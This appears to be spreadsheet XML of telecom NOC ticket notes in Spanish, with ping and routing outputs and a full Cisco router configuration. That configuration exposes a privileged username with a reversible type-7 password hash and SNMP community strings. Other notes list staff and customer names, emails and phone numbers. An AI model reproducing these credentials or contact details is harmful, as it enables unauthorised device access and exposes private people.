   10.72.124.19/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t>F4565715</t>
  </si>
  <si>
    <t>ENALCE OPERATIVO POR PARTE DE CLARO SE PORCEDE CON CIERRE POR ENERGIA COMERCIAL
TORRE_CAFE#PING VRF TYT 192.168.174.166 RE 1000
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1000, 100-BYTE ICMP ECHOS TO 192.168.174.166, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (1000/1000), ROUND-TRIP MIN/AVG/MAX = 4/5/20 MS
TORRE_CAFE#</t>
  </si>
  <si>
    <t>RUTA
PE 10.184.12.7
TORRE_CAFE#SH IP ROUTE VRF TYT 192.168.174.166
ROUTING TABLE: TYT
ROUTING ENTRY FOR 192.168.174.164/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA BGP 13682
  ADVERTISED BY BGP 13682
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA GIGABITETHERNET9/10.958
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1</t>
  </si>
  <si>
    <t>F4565733</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PORCEDE CON CIERRE POR HARWARE DE CLIENTE .
ROUTER CPE ACTIVO HACE 30 SEMANAS.
CISCO IOS SOFTWARE, 1841 SOFTWARE (C1841-ADVSECURITYK9-M), VERSION 12.4(6)T6, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2006 BY CISCO SYSTEMS, INC.
COMPILED FRI 08-DEC-06 13:36 BY KELLYTHW
ROM: SYSTEM BOOTSTRAP, VERSION 12.4(13R)T, RELEASE SOFTWARE (FC1)
IP2148020 UPTIME IS 30 WEEKS, 1 DAY, 12 HOURS, 16 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C1841-ADVSECURITYK9-MZ.124-6.T6.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1841 (REVISION 7.0) WITH 116736K/14336K BYTES OF MEMORY.
PROCESSOR BOARD ID FTX1209Z05B
2 FASTETHERNET INTERFACES
1 SERIAL(SYNC/ASYNC) INTERFACE
1 ATM INTERFACE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
191K BYTES OF NVRAM.
31360K BYTES OF ATA COMPACTFLASH (READ/WRITE)
CONFIGURATION REGISTER IS 0X2102
IP2148020#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4399 BYTES
!
VERSION 12.4
SERVICE NAGLE
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TCP-KEEPALIVES-OUT
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME IP2148020
!
BOOT-START-MARKER
BOOT-END-MARKER
!
LOGGING BUFFERED 4096 DEBUGGING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AAA SESSION-ID COMMON
!
RESOURCE POLICY
!
CLOCK TIMEZONE GMT -6
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
IP CEF
!
!
!
!
IP TCP SYNWAIT-TIME 10
NO IP BOOTP SERVER
IP DOMAIN NAME TELECOM.COM.SV
!
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 03100807085F221E1E5941
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.2.10 255.255.255.255
!
INTERFACE FASTETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/IP2148020SV/_/
 BANDWIDTH 5120
 IP ADDRESS 10.138.88.58 255.255.255.248
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE FASTETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.150.142 255.255.255.252
 IP TCP ADJUST-MSS 1460
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE ATM0/0/0
 NO IP ADDRESS
 NO ATM ILMI-KEEPALIVE
 DSL OPERATING-MODE AUTO
!
INTERFACE ATM0/0/0.1 POINT-TO-POINT
 DESCRIPTION APOYO INTEGRAL (IP2148073/BACKUP)
 BANDWIDTH 512
 IP ADDRESS 10.142.191.226 255.255.255.192
 IP MTU 1460
 IP RIP ADVERTISE 45
 IP VIRTUAL-REASSEMBLY
 SHUTDOWN
 NO SNMP TRAP LINK-STATUS
 ATM ROUTE-BRIDGED IP
 BRIDGE-GROUP 1
 BRIDGE-GROUP 1 SPANNING-DISABLED
 PVC 0/46
  BROADCAST
  ENCAPSULATION AAL5SNAP
 !
!
INTERFACE SERIAL0/1/0
 NO IP ADDRESS
 SHUTDOWN
 NO FAIR-QUEUE
 CLOCK RATE 2000000
!
ROUTER BGP 64530
 NO SYNCHRONIZATION
 BGP LOG-NEIGHBOR-CHANGES
 NETWORK 10.166.2.10 MASK 255.255.255.255
 NETWORK 192.5.24.0
 REDISTRIBUTE CONNECTED
 REDISTRIBUTE STATIC
 NEIGHBOR 10.138.88.57 REMOTE-AS 22833
 NEIGHBOR 10.138.88.57 ROUTE-MAP PRINCIPAL_IN IN
 NEIGHBOR 10.138.88.57 ROUTE-MAP PRINCIPAL_OUT OUT
 NO AUTO-SUMMARY
!
IP ROUTE 192.5.24.0 255.255.255.0 192.168.150.141 NAME FIREWALL
!
IP AS-PATH ACCESS-LIST 1 PERMIT ^$
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP PREFIX-LIST DEFAULT SEQ 5 PERMIT 0.0.0.0/0
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 97 PERMIT 10.95.61.84
ACCESS-LIST 97 REMARK SNMP
ACCESS-LIST 97 PERMIT 10.95.61.33
ACCESS-LIST 97 PERMIT 10.95.61.11
ACCESS-LIST 97 PERMIT 10.95.61.15
ACCESS-LIST 97 PERMIT 10.95.61.31
ACCESS-LIST 97 PERMIT 201.247.246.11
ACCESS-LIST 97 PERMIT 201.247.156.100
ACCESS-LIST 97 PERMIT 201.247.156.93
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY SAC RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
NO CDP RUN
!
!
ROUTE-MAP PRINCIPAL_IN PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST DEFAULT
 SET WEIGHT 250
!
ROUTE-MAP BACKUP_OUT PERMIT 10
 MATCH AS-PATH 1
 SET METRIC 100
!
ROUTE-MAP PRINCIPAL_OUT PERMIT 10
 MATCH AS-PATH 1
 SET METRIC 50
!
ROUTE-MAP BACKUP_IN PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST DEFAULT
 SET WEIGHT 200
!
!
!
CONTROL-PLANE
!
BANNER LOGIN ^C
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
^C
!
LINE CON 0
 AUTHORIZATION EXEC CON_ACC
 LOGIN AUTHENTICATION CON_ACC
LINE AUX 0
LINE VTY 0 4
!
SCHEDULER ALLOCATE 20000 1000
NTP CLOCK-PERIOD 17180399
NTP SOURCE FASTETHERNET0/0
NTP SERVER 201.247.152.249
NTP SERVER 201.247.152.233 PREFER
!
WEBVPN CONTEXT DEFAULT_CONTEXT
 SSL AUTHENTICATE VERIFY ALL
 !
 NO INSERVICE
!
END
IP2148020#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (1 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED,
                0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
    CONSOLE LOGGING: DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING: LEVEL DEBUGGING, 347 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    LOGGING EXCEPTION SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 351 MESSAGE LINES LOGGED
LOG BUFFER (4096 BYTES):
N: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 14 11:41:58.689 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 14 11:43:37.692 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*APR 14 11:43:38.692 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*APR 18 07:39:28.110 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 18 07:39:29.110 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 18 09:26:08.331 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*APR 18 09:26:09.331 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*APR 24 01:09:43.655 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 24 01:09:44.655 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 24 06:54:24.305 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*APR 24 06:54:25.305 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*APR 25 07:55:17.150 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 25 07:55:18.150 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 25 15:21:17.987 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*APR 25 15:21:18.987 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*APR 29 11:43:58.459 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 29 11:43:59.459 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*APR 29 11:59:38.488 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*APR 29 11:59:39.488 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY  1 06:05:23.329 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY  1 06:05:24.329 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY  1 07:35:13.496 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY  1 07:35:14.496 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY  6 01:47:06.398 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY  6 01:47:07.398 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY  6 05:42:56.838 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY  6 05:42:57.838 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY 10 08:15:57.999 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY 10 08:15:58.999 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY 10 08:19:48.006 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY 10 08:19:49.006 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY 11 07:33:10.628 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY 11 07:33:11.628 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY 11 07:36:20.634 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY 11 07:36:21.634 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY 13 05:10:45.785 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY 13 05:10:46.786 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY 13 07:52:06.100 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY 13 07:52:07.100 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY 14 06:43:18.673 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY 14 06:43:19.673 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO UP
*MAY 14 07:53:58.804 GMT: %LINK-3-UPDOWN: INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
*MAY 14 07:53:59.804 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
IP2148020#
SHOW CLOCK
*00:36:26.024 GMT TUE MAY 17 2022
IP2148020#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  192.168.150.142         -   001F.6C6F.FB41  ARPA   FASTETHERNET0/1
INTERNET  192.168.150.141         0   D476.A07B.E191  ARPA   FASTETHERNET0/1
INTERNET  10.138.88.57           14   183D.5E15.B7B0  ARPA   FASTETHERNET0/0
INTERNET  10.138.88.58            -   001F.6C6F.FB40  ARPA   FASTETHERNET0/0
IP2148020#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
FA0/0                          UP             UP       WAN PRINCIPAL/_/IP2148020SV/_/
FA0/1                          UP             UP       LAN DEL CLIENTE
AT0/0/0                        DOWN           DOWN
AT0/0/0.1                      ADMIN DOWN     DOWN     APOYO INTEGRAL (IP2148073/BACKUP)
SE0/1/0                        ADMIN DOWN     DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
IP2148020#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
FASTETHERNET0/0            10.138.88.58    YES NVRAM  UP                    UP
FASTETHERNET0/1            192.168.150.142 YES NVRAM  UP                    UP
ATM0/0/0                   UNASSIGNED      YES NVRAM  DOWN                  DOWN
ATM0/0/0.1                 10.142.191.226  YES NVRAM  ADMINISTRATIVELY DOWN DOWN
SERIAL0/1/0                UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.166.2.10     YES NVRAM  UP                    UP
IP2148020#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN APOYO 10.138.88.58
  PING 10.138.88.58: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.138.88.58 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.30.87
DISPLAY IP ROUTING-TABLE VPN-INSTANCE APOYO 10.138.88.58
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : APOYO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.138.88.58/32  DIRECT  0    0                 0.0.0.0         VLANIF1167</t>
  </si>
  <si>
    <t>F4565739</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO SE PROECEDE CON CIERRE POR ENERGIA COMERCIAL
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PIN -VP TRANSFERENCIAS 10.218.48.106
  PING 10.218.48.106: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.48.106: BYTES=56 SEQUENCE=1 TTL=58 TIME=89 MS
    REPLY FROM 10.218.48.106: BYTES=56 SEQUENCE=2 TTL=58 TIME=81 MS
    REPLY FROM 10.218.48.106: BYTES=56 SEQUENCE=3 TTL=58 TIME=89 MS
    REPLY FROM 10.218.48.106: BYTES=56 SEQUENCE=4 TTL=58 TIME=86 MS
    REPLY FROM 10.218.48.106: BYTES=56 SEQUENCE=5 TTL=58 TIME=90 MS
  --- 10.218.48.106 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 81/87/90 MS
&lt;GNCYGTG2N2D4A05A15EIM10&gt;
PE 10.179.28.50
&lt;GNCYGTG2N2D4A05A15EIM10&gt;DIS IP ROUTING-TABLE VP TRANSFERENCIAS 10.218.48.106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t>
  </si>
  <si>
    <t>F4565747</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO SE PROCEDE CON EL CIERRE DE TTK POR ENERGIA COMERCIAL
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PING -VPN-INSTANCE TRANSFERENCIAS 10.218.51.8
  PING 10.218.51.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=1 TTL=58 TIME=92 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=2 TTL=58 TIME=88 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=3 TTL=58 TIME=94 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=4 TTL=58 TIME=90 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=5 TTL=58 TIME=95 MS
  --- 10.218.51.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 88/91/95 MS
&lt;GNCYGTG2N2D4A05A15EIM10&gt;
PE 10.179.28.50
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PING -VPN-INSTANCE TRANSFERENCIAS 10.218.51.8
  PING 10.218.51.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=1 TTL=58 TIME=92 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=2 TTL=58 TIME=88 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=3 TTL=58 TIME=94 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=4 TTL=58 TIME=90 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=5 TTL=58 TIME=95 MS
  --- 10.218.51.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 88/91/95 MS
&lt;GNCYGTG2N2D4A05A15EIM10&gt;</t>
  </si>
  <si>
    <t>F4565792</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN DHL_TELMEX 187.128.59.126
  PING 187.128.59.126: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.59.126 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.19
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DHL_TELMEX 187.128.59.126
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DHL_TELMEX
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 187.128.59.124/30  DIRECT  0    0             D   187.128.59.125  GIGABITETHERNET6/0/3.436			</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 17:15
PARA: DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; BYRON.JUAREZ@CLARO.COM.GT &lt;BYRON.JUAREZ@CLARO.COM.GT&gt;; GABRIELA.ORANTES@CLARO.COM.GT &lt;GABRIELA.ORANTES@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMDHG006646 || ID LOCAL DHL_277200005_210COMBEX || ENLACE INTERMITENTE
*-*-*-*</t>
  </si>
  <si>
    <t>SE REENVÍA CORREO A CLIENTE SOLICITÁNDOLE APOYO PARA AUTORIZAR EL INGRESOS DE PERSONAL TÉCNICO ASIGNADO, EN ESPERA DE RESPUESTA:
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMDHG006646 || ID LOCAL DHL_277200005 (SE CORTA ASUNTO)</t>
  </si>
  <si>
    <t>F4565834</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN
ENVIADO: MARTES, 17 DE MAYO DE 2022 8:21
PARA: WILBERT WELLINGTON GABRIEL C &lt;WGABRIEL@BACCREDOMATIC.GT&gt;; TELEMATICAGT@CREDOMATIC.COM &lt;TELEMATICAGT@CREDOMATIC.COM&gt;; CESOLARES@BACCREDOMATIC.GT &lt;CESOLARES@BACCREDOMATIC.GT&gt;; TELEMATICAGT@CREDOMATIC.COM &lt;TELEMATICAGT@CREDOMATIC.COM&gt;; FELIPE ESTUARDO SAQUICH COYOY &lt;FESAQUICH@BACCREDOMATIC.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: CREDOMATIC GUATEMALA, S.A. -- 17400191T -- C.C. MIRAFLORES
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL ENLACE REPORTADO, SE HA GENERADO UNA VISITA TÉCNICA. POR LO QUE SE REQUIERE NOS PUEDA APOYAR GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO EN DICHA AGENCIA. A SU VEZ CONFIRMAR UN HORARIO EN EL QUE SE PUEDA HACER PRESENTE EL PERSONAL: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CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE CARLOS SOLARES SOLICITANDO AVANCES, SE VERIFICA QUE HAY PRUEBAS PENDIENTES, CL COMENTA QUE YA APLICO REINICIO EN PR, SE DEJA EN CONFERENCIA CON DARWINH.ESPANA PARA COORDINAR UNA POSIBLE VISITA | A ESPERA DE LO QUE SE DETERMINE | WIP</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS SOLARES AL 59669635 INDICA QUE AHORITA ESTA GESTIONANDO LOS PERMISOS QUE CUANDO TENGA RESPUESTA NOS ESTARA RESPONDIENDO POR CORREO SI NO QUE SE LE LLAME EN 30 MIN NUEVAMENTE**
ID 2001825794
**</t>
  </si>
  <si>
    <t>F4565868</t>
  </si>
  <si>
    <t>TECNICO INDICA QUE LLEGA A SITIO DE CLIENTE EN 25 MINUTOS
2018419123</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO PLANTA EXTERNA REGION METROSUR				
	WO OPEN                        		&lt;&lt;	8:50:00
1/4	ELMER FLORES	58260888	2 HORAS	10:50:00
2/4	ALDO DIAZ	58261057	3 HORAS	11:50:00
3/4	RENE AGUSTIN	58261183	5 HORAS	13:50:00
4/4	RODOLFO MORALES	58261609	6 HORAS	14:50:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK PARA INDICAR EL ARRIBO DE PERSONAL TECNICO
ID 2001850537</t>
  </si>
  <si>
    <t>F4565879</t>
  </si>
  <si>
    <t>SE VALIDA QUE NO HAY SEGUIMIENTO DESPUÉS DE LA CONFIRMACIÓN DE LA VENTANA DE CAMBIO DEL DIA  18/05/2022   POR LO QUE SE MUEVE A WIP SE LE NOTIFICA AL GESTOR SAUL.VALENZUELA PARA EL SEGUIMIENTO Y EN CASO YA QUE NO HAY NADA PENDIENTE Y  MOVERLO NUEVAMENTE A PC INDICAR QUE ES LO PENDIENTE PARA NO CAMBIARLO.</t>
  </si>
  <si>
